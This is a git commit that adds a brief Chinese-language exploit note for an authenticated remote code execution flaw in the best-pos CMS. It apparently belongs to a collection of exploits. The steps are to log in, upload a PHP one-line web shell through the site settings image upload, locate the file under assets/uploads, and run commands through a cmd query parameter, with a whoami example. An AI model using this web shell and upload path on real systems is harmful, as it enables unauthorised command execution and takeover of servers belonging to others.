add best-pos cms Authenticated RCE

2023-02-21 14:40:37 +08:00 · 2023-02-21 14:40:37 +08:00 · f3b93b2199
commit f3b93b2199
parent ccc0d2d8be
1 changed files with 11 additions and 0 deletions
--- a/CMS/best-pos/best-pos
+++ b/CMS/best-pos/best-pos
@ -0,0 +1,11 @@
+# best-pos cms Authenticated RCE
+
+### 利用步骤
+1. 登录
+2. 访问`http://localhost/kruxton/index.php?page=site_settings`
+3. 上传图片
+   1. `<?php system($_GET['cmd']); ?>`
+4. 访问 `http://localhost/kruxton/assets/uploads/`
+5. 找到上传的shell 文件
+6. 执行cmd 验证
+   1. `http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami`